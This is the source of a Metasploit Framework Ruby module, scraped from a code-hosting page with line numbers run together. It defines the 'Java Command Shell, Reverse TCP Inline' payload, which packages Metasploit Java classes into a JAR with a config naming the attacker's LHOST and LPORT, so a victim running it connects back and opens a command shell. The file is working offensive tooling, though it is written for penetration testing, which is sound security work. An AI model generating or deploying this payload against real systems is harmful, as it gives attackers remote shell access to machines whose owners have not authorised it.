Path: blob/master/modules/payloads/singles/java/shell_reverse_tcp.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 749778include Msf::Payload::Single9include Msf::Payload::Java10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Java Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => ['mihi', 'egypt'],19'License' => MSF_LICENSE,20'Platform' => ['java'],21'Arch' => ARCH_JAVA,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShell,24'Payload' => { 'Offsets' => {}, 'Payload' => '' }25)26)27end2829def generate_jar(opts = {})30jar = Rex::Zip::Jar.new31jar.add_sub('metasploit') if opts[:random]32class_files.each do |path|331.upto(path.length - 1) do |idx|34full = path[0, idx].join('/') + '/'35if !jar.entries.map(&:name).include?(full)36jar.add_file(full, '')37end38end39data = MetasploitPayloads.read('java', path)40jar.add_file(path.join('/'), data)41end42jar.build_manifest(main_class: 'metasploit.Payload')43jar.add_file('metasploit.dat', stager_config(opts))4445jar46end4748def stager_config(opts = {})49ds = opts[:datastore] || datastore50c = ''51c << "LHOST=#{ds['LHOST']}\n" if ds['LHOST']52c << "LPORT=#{ds['LPORT']}\n" if ds['LPORT']53# Magical, means use stdin/stdout. Used for debugging54# c << "LPORT=0\n"55c << "EmbeddedStage=Shell\n"5657c58end5960def class_files61[62['metasploit', 'Payload.class'],63['javapayload', 'stage', 'Stage.class'],64['javapayload', 'stage', 'StreamForwarder.class'],65['javapayload', 'stage', 'Shell.class'],66]67end68end697071